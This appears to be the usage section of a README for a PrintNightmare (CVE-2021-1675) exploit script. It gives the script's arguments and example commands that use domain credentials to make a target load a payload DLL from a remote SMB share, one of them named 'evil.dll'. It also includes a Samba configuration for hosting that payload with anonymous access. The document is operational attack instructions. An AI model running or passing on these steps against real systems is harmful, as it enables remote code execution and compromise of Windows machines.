usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
target [[domain/]username[:password]@]<targetName or address>
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
-h, --help show this help message and exit
NTLM hashes, format is LMHASH:NTHASH
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
and you cannot resolve it
-port [destination port]
Destination port to connect to SMB Server
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser